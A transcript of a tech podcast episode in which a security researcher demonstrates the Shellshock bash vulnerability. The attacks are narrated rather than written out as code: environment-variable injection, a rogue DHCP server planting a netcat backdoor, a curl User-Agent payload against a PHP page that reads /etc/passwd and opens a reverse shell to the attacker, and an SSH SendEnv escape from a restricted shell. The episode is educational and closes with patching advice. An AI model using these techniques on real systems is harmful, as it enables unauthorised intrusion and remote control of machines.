Right, and we're going to demo some of that, but let me explain the local case first, okay? So the fact that your bash instance might be vulnerable to this is, again, the soap in the shower. Does it actually mean anything to you? In most cases, no. Locally, the way it could be used is for privilege escalation, going from a non-privileged user to something higher. So if I, the attacker, control this environment variable, then I could make future invocations of Bash do whatever I want. So let's say I'm able to take a program that is running with higher privileges and fool it into doing something with the environment I control. I can get it to run my code, my command, at a higher level of privilege. And on Mac OS X, apparently there's a privilege escalation opportunity with VMware Fusion for that exact reason. Okay? And if you don't mind, Padre, I'm seeing a lot of questions in the chat room where folks are asking, they're saying, hey, how does foo relate to the who am I command? And I think that's a fair question, and I think it's worth addressing. So if we could go back to the screen, let's spend just a minute on that before we move on, because this is very important to understand. Okay, so for those of you asking, again, in Unix, there are environment variables. These are things you can set with export whatever equals some information, okay? So again, export whatever equals some information. This information gets passed to future invocations of Bash. So when I call Bash again, because I'm running another program or running a shell script, that next instance of Bash is going to get this environment information. That's all well and good. That's fine. But if the attacker controls this some way, and we're going to show three ways the attacker could, then the attacker can make Bash do whatever you want. So again, just the whole classic, say, hey, echo vulnerable. Saying export whatever equals to a Bash function, semicolon, echo vulnerable. This makes Bash evaluate and run my command. And if I just call Bash, it comes back with vulnerable. Because when I ran Bash again, it interpreted my environment and ran that evil command. Is that a little bit clearer for everybody?
I think so.
Okay, cool. And I just think that's really important to understand, because I want everybody to get the most out of this particular demonstration. So with that, again, setting environment variable and running Bash locally, that's one way to test. But let's actually show you how you can slip on this soap sitting in your computer or sitting in your shower, and where things can go wrong, okay? So right here, I'm running Armitage, an open source front end for the Metasploit framework. And I've got the latest version of the Metasploit framework. And the Metasploit framework has several modules that you can try in your own environment to see if you're vulnerable to different things. And these are kind of pre-canned attacks for known things. They're not going to help you catch the unknown. And that's why I like showing how things work, is so you can catch the unknown, okay? So to search for that, we're just going to search for Bash here in Armitage's module browser. And you'll see that there's an exploit for mod CGI in the Apache web server. You'll see there's one for VMware Fusion to actually elevate your privileges. And there's also a DHCP server option to make it when somebody requests an address via DHCP on their network, if you're on that network, you can try to get their computer to execute whatever command you want. Okay? Making sense?
Absolutely.
Okay, cool. And that's a scary thing. That's one that has people scared. When I was going to a conference last week and I was using GoGo Wi-Fi on the airplane, I was a little scared. I'm like, is Mac OS X vulnerable to this? Is the Mac OS X DHCP client, is somebody going to take and own my computer? And as far as I know and have heard, that's not the case with Mac OS X's DHCP client, but other Unix systems potentially.
Right. So far, it's essentially the same as the first example, where DHCP can carry with it some environment data, and the next time you run Bash, that environment data gets executed. We were talking before the show, and you were saying, look, if you've got someone who's on your network issuing a spoofed false DHCP response, then you've got bigger problems than Bash. But as you were saying, we often find ourselves in situations where we may be getting an address, a DHCP, making a DHCP request to a system that's trying to put some sort of advanced persistent threat into our computer, which we will then take back into our own network.
Okay, well, an APT, that's a type of actor, not actually a tactic. But I have to really stick with the terminology, be very pedantic about that.
Oh, of course, of course. That's your job.
No, but what I would say, though, is with Bash, again, it's we're doing risk assessment here, right? With DHCP, you have to have a vulnerable version of Bash, and you have to have a system that when the DHCP client is run, it kicks off a script that's going to interpret or take information, put in the environment, and execute Bash in the first place. And do Linux distributions do that? Yes, some of them do. But does my Mac do that? As far as I know, no, okay? And I have to be very clear to you guys, I haven't checked the Mac thing fully, so I could be wrong about that. But as far as I've heard, the answer is no on that. And people love to jump on Macs. So let's say we're sticking with Linux right now, okay?
Right.
That said, let me demo it, because I think a demo is worth a thousand points of discussion. So here we are. I'm going to kick off a DHCP server from the Metasploit framework, and I'm configuring it to assign addresses in a certain range. And I'm telling it to, when somebody requests a address via DHCP, to run netcat that creates a backdoor on, say, port 4445, okay? So I'm going to kick off this evil DHCP server. And let me just go ahead and hit launch. And I'm going to come over here to a Linux system that is vulnerable to shell shock, and I'm going to just grab an address via DHCP, okay? So I'm grabbing an address via DHCP. You can see my address is 192.168.95.80. Now what I'm going to do is I'm going to try to connect to that system on port 4445 and see if my backdoor is there. So port 44445, connect. And if all goes well, if all went well, I should say. I did test this a moment ago, but what's that? Oh, you know what? I typed the IP address wrong. 192.168.95.80. Exploit-J. So, yes, always target your target with the right IP address, right? If all goes well, though, I can get access to that system because of the back door I opened up when they requested an address via DHCP. So that was one use of shell shock, okay? Wow. Showing, hey, via DHCP, I'm able to make people who request an address run an arbitrary command, okay? If they have a vulnerable version of Bash and if their DHCP client is kicking off a shell script with environment variables influenced by what's in the reply. Different DHCP clients work differently, okay?
Okay, well, so that's assuming that the client is on your network and you can somehow send it a DHCP request, that a DHC response that has that in the environment. What about remote? So true remote, the client's not on your network. Can I still use Bash?
Absolutely. So we're going to demo that here in just 1 minute. Just to cap that discussion, though, if an attacker is on your network and spoofing DHCP, you have much bigger problems than shell shock. Trust me on that, because all your Windows is going to get owned and everything else. So this is, I don't like hyperbole. I don't like things blown out of proportion. That's why I'm trying to show you how it can be exploited, but I'm trying to caveat it and ground it in reality. Security researchers love attention. They love telling you the sky is falling. But let's be real about it. So,
smaller bar of soap.
Smells really bad. Yeah. All right. Let's go back and show you a remote opportunity. So what I'm going to do, let me just kill this thing here. And what we're going to do is go over to 192.168.95.80, demo.php. Okay. And what I have on this vulnerable system, this system with our vulnerable Bash, is I have a PHP script, okay? Mm-hmm. And all this PHP script does is Let's go take a look at it. Let's go var www. And let's take a look at demo.php. All this script does is use a PHP command called shell exec to run who am I. Okay? Everybody with me so far?
Mm-hmm.
So shell exec is a function in PHP to run the shell, ask it to run a command, give you back the output. Okay? So that's pretty benign. Like maybe I'm going to do shell exec and tell it to run ping or traceroute. A lot of routers do stuff like that. Okay? So what we're curious about is if we, as remote attackers, can take advantage of this shell exec and use it to run code on this target system to get access. And the answer is yes, because shell exec does actually influence the environment. So let me make a change here. And we're going to make it, instead of running who am I, we're going to make it run the command set. Okay, and what set does is just shows what's in your environment. Now let's come back here, hit enter or hit refresh. And I want you to see some of the things that end up in the environment of this command run with shell exec. And you've got things that are taken directly from the HTTP headers, the things your browser sends to the web server. And one of the things I want to point out, because everybody's talking about it, is the user agent. That's something your browser sends to say, hey, let me zoom in a little bit. That's a little too much. This is something your browser sends, say, hey, here's which browser I have.
Right.
Okay.
Right.
So what we're going to do is we're going to modify our user agent with curl and make this system execute things on behalf. So let me come back and I'm going to just put it back to who am I. I just want to keep this pretty benign. Because I want you to have an idea of what it's really doing. So, okay, we're back to who am I, right? Now, let me just open up a terminal. And let's use curl, my favorite hacking tool, right? And we're just going to do this. We're going to do curl-a. Well, first, we'll just do curl. And we'll do 192.168.9580.demo.php, okay? And we're getting back that user ID, the output of who am I. Now, let's change the user agent. Let's do the whole bash function thing.
Oh, wow.
Okay. And let's do bin echo. And we'll do, let's do a single quote there. We'll do bin echo. Uh-oh. We'll call it. Yeah, uh-oh is good. And close quote. Looks good to me. And let's do this. So you can see when we change the user agent, we're getting it to echo stuff, right? I could do stuff like cat etsy password, get users on the box, okay? And I'm going to do one more. Well, actually, I like getting code execution. But you can see now I've got the equivalent of a shell on that system. I can make it run whatever commands I want. But Whoa. Let's do, we'll do netcat. And we'll make it connect back to me, the attacker, 192.168.95.189. And we'll do port, 8,000. And let's come over to Armitage and create a listener here on port 8,000. Bloop. Let's see if this actually runs long enough and doesn't die right away. We'll find out. So port 8,000, rock and roll, go. Hopefully I've got my IP right? I have the memory of a goldfish. That's a problem I have personally. But there you go. You can see. In Armitage, we now have access to that system, okay? But the point is I'm using shell exec with a vulnerable version of bash. So one of the things you should go do, let's see if it actually wants to run my commands for me. Let's do this. Let's do bin ls. So for some reason, my shell here is not actually giving me output I would hope for, but we could play with it later. But you've seen I can actually get this thing to – oh, you know why? I did netcat. I didn't do netcat-e. Hi, I'm...
no, but we can see it. I mean, you've been able to execute code remotely, and you've been able to own the machine. So it's now your tool, security tool, is now able to escalate its own privileges. It can basically execute anything remotely. That's
okay, so
scary.
When I made netcat run-e bin sh to run a shell for me, now I've got a shell, okay? Given to me just via curl. Okay, so just showing you, to just take you through what we did again. Curl, we just changed the user agent and told it, hey, run Netcat, connect to me, the attacker, on whatever port, and execute bin sh. Give me a shell so I, the attacker, can control that system. Okay? But watch what happens when we go to, instead of doing shell exec, we'll just do plain exec. And exec just runs the command as is. Okay? Let's go to my browser. And let's just do a refresh. You're going to see same output, right? This program is working as I, the programmer, intended. It's just running www data. So now let's try to exploit this. Well, let's go. I got so many terminals here. Let's do our curl. Uh-oh, nonsense. Whoops. I'm going to clear this. I want to actually see it. So
yeah.
Okay, well, it's actually, again, with exec even, for some reason, it's passing my code to the environment. So in this case, yeah, upgrade your bash, okay? When I was auditing my server last week, this is what I was doing. I was going through all my web applications, looking everywhere I would run a program. There's only a few places. And I was saying, is there a way I can influence the environment? Yes. Let me take a look at how I'm influencing the environment and see if I can actually make it do something. And if I can make it do something, like touch a file in the temp folder, then I knew I had a problem. In the case of the web applications I was working with, the environment wasn't getting passed, so even with a vulnerable bash, I was okay. But in this particular web application, yes, the environment's getting passed. It's bad news. Need to upgrade. Okay.
That's horrible. And the thing that strikes me much is how easy it is to do that. I mean, this is easier than the pivot that you showed us a couple of weeks ago, and it potentially far more damaging. Let me get Cheebert in here really quickly. Cheebert, we've bantered about this a little bit, the forgotten box syndrome, that there are IT administrators all around the world who are now trying to remember every last Linux box they may have internet facing, and there's a mad rush to get everything patched.
Yeah. And your question is?
My question is, how scared are you? How much have you been panicking looking through your NOC?
I've been staying late. I don't like staying late.
Okay.
The saving grace for me is at least I've got most of my Linux boxes are behind my firewall. So that's one good thing. The second good thing is once I heard about this, some of the Linux boxes that I don't use very often, I just shut them down until I can go and actually get in and examine it, check what versions it's running, and do the upgrades if necessary.
Right. Mudge, now that you've scared us into patching all of our boxes, can you show us what a defense looks like?
Can I show what your defense looks like? Sure. Upgrade your bash or eliminate code that actually executes third-party programs and replace it with an API call. Say, was the programmer being lazy, and is there a better way I can do this? And in my own programming experience, I find it's far more common now to call an API to do something versus invoking a third-party utility.
Right.
You're dealing with a really non-robust framework if your way of doing things is to actually invoke a utility to do it. So, or just upgrade your bash, okay? I would like to show you one more demo, which is related to SSH, because that's one folks have had some concern about as well.
Yes, please.
Okay, cool. So let's come back here over to my target system. And this is a little bit contrived, but I just want to show you what's kind of possible. And what I've done is I've given the user SNMP a password, okay? And their password is SNMP. So I've created an account with a weak password. And what I've done is changed their shell that's run when they log in to a program, bin no dice, okay? And what I'm going to do is just show you what bin no dice looks like. And bin no dice, all it does, it's a shell script that runs echo and says, this user is not allowed to log in. And this is a stand-in for maybe a shell that really restricts the user's permissions and maybe gives them a few choices of what to do. There was a program that did just that, that is listed as being vulnerable to shell shock. And that program is called GitOlite. And so that's a real world example of where I'm showing you what I'm showing you applies. So what we're going to do is over here on our attacker system, we're going to SSH user SNMP to that system, 192.168.9.5.80, log in. And if I can get the password right, SNMP. And what you see is the user is not allowed to log in, right? Cool?
Okay.
Now, the question is, can I, the attacker, before that shell script is run, influence the environment that the shell script is run in and make it that environment have code in the environment variable that's run and interpreted on my behalf? And the answer is yes, and we're going to do that. So we're going to do is we're going to do export LC demo equals single tick. And we're going to put in, again, a bash function that does nothing, semicolon. And we'll just do you want me to do the whole echo you are owned kind of thing, or do you want to do a netcat one again?
No, just echo the you are owned.
Okay, so we'll just do it. Echo you are owned. Okay, if I could only type. Apparently, I'm having trouble with that today. And let's go ahead and SSH, but we're going to do an option called send end. Which allows us to pick an option in our own environment and send it when we SSH. So this environment variable is going to be send and set before that actual shell script is run, the no dice one. Okay. So we'll just log in SNMP, and there you go. You can see you are owned.
Oh, wow.
So that's the point here is, and that's why shell shock is a scary. And again, the analogy. Everyone's got bash on their Unix systems or Unix derivatives, okay? That's the soap, okay? That's everywhere. It's ubiquitous. Are there cases where you can slip on the soap in your shower and be hurt? Yeah, of course, okay? Most cases, are you in trouble? No. It's a few narrow circumstances. Do you have a web application that is running a third party or running a program and running a program through bash where the attacker can influence the environment variables, okay? Running third-party programs in a web app is pretty shady already, okay? But that's something to audit for, and that's probably the most dangerous one. DHCP. Well, if an attacker is on your network with a rogue DHCP server, again, you're already owned. Sorry, that's no fun. The SSH thing. If you're allowing users to SSH into your box and you're giving them restricted shells already, well, you're already at a high risk. You're already kind of halfway there to giving them other ways to look for ways to break out of that. So the situations where the shell shock is dangerous to you, yeah, they're there. Audit for them. Don't ignore it. Upgrade bash, okay? I'm not saying not to. But I think the future of this bug, once it's squashed out of the mainstream things, is going to be just privilege escalation opportunities through where the sysad has chained a bunch of bash scripts together and allowed users to do things. So it's going to get fixed, not the end of the world, but there's kind of those common situations.
So the voice of reason, Mudge, tells us that it is a pretty scary exploit, but it's not the end of the internet as we know it.
Yeah, again, it's soap.
It's soap.
I mean, is it dangerous? Can you slip on it? Yeah. Did I show you, like, lots of scary pictures of people slipping on soap? Yeah, I just did. But I'm not super freaked out about it. Just audit your web applications. Look for this kind of thing. Don't let rogue actors on your network. I mean, if they're on there already, well, you got bigger problems.
Raphael Mudge, the Armitage hacker from advancedpentest.com. We want to thank you so very much for dropping the knowledge about shell shock. I know a lot of people have heard about it, but now you actually see how it works in the wild. Could you please tell the members of the Twiat Riot where they can find you, where they can find your work, and where they can get your security tools?
Okay, sure. So I'm the developer of a product called Cobalt Strike, which is something red teams use to actually simulate advanced persistent threat. And you can learn about that at www.advancedpentest.com. And if you want to read my blog, that's blog.cobaltstrike.com. You will not see a blog post from me on Shellshock because, you know, I'm interested on what an attacker does once they get into your network.
Right.
But, you know, it's there. It's a problem. You know, go look at it.
It's another vector of entry.
Thank
you so very much. Mudge, you know, it is always a privilege and an honor to have you on the show. We'll definitely have you back next time you have something you want to show off.
Thanks, Padre. I really appreciate that, man. Again, you know, it's a lot of fun. And when you're in D.C. next, I really, really want to take you to one of my favorite spots. I'm really looking forward to doing that.
I'll be there in November. And yes, we'll make it a date.
Excellent.
Whatever,
man.
They call it, whatever the kids are calling that these days. I also want to thank my co-host, Mr. Brian Chi. Chibert, I've been watching you on the other monitor, just sort of shaking your head slowly. So I'm not even going to ask you if you've been shell-shocked, but could you please tell the Twilight Right where they can find you, what you're working on, and what you're excited about?
Well, I am eating the learning curve on how to run the new spec benchmarks. I'm going to be doing some testing on some new HP Gen 8 servers and the latest Lenovo server, and that ought to be a lot of fun.
Fantastic. Thank you again, both to Brian Chi and for Mudge, for being part of this episode of This Week in Enterprise Tech. I'm sorry, folks, that's it. We have gone way over time on this very special episode. Now that you've learned everything that you need to know about Shellshock, make sure to check out our show page. You can find it at twit.tv/Twiat. If you go there, you also find a little drop-down menu that will give you options for automatically downloading every episode of Twiat onto the device of your choice. If you want to stay up with the latest and the greatest in enterprise, in security, in what and how the world is being connected, make sure you drop by. Again, that's twit.tv/Twiat. Also, you can find me on Twitter. That's right, I do the social media thing. Go ahead and drop by twitter.com/PadreSJ. That's at PadreSJ. If you follow me, you'll see what I'm doing in each and every single episode of This Week in Enterprise Tech. And you could also suggest topics for future episodes. You can also see what I do when I'm not doing Twiat. That includes the other shows I do on the Twit TV network, including Padre's Corner on Tuesday nights at 7:30, or Know How at 11 o'clock on Thursdays, Coding 101 at 1:30. Join us and be part of the Twit TV experience. Also, if you really want to be part of that experience, drop by our live stream at live.twit.tv. We broadcast this show 2:30 p.m. Pacific time every Monday. And if you come early and stay late, you get to see the pre-show, the post-show, and all the bloopers that we take out of the final cut. And as long as you're going to watch the live stream, why not drop in our chat room at irc.twit.tv? You'll see me pull questions and queries out of the chat room at all times. Again, it's part of that experiment that is this bi-directional communication that is Twit TV. Finally, I want to thank everyone here who makes the show possible. Lisa and Leo, of course. And my substitute technical director today is Victor. He's kind of shy. He doesn't like to show himself. But I will say that he's Filipino, and I will kill him. Until next time, I'm Father Robert Ballester, reminding you that if you want to know what's going on in the enterprise, just keep Twiat.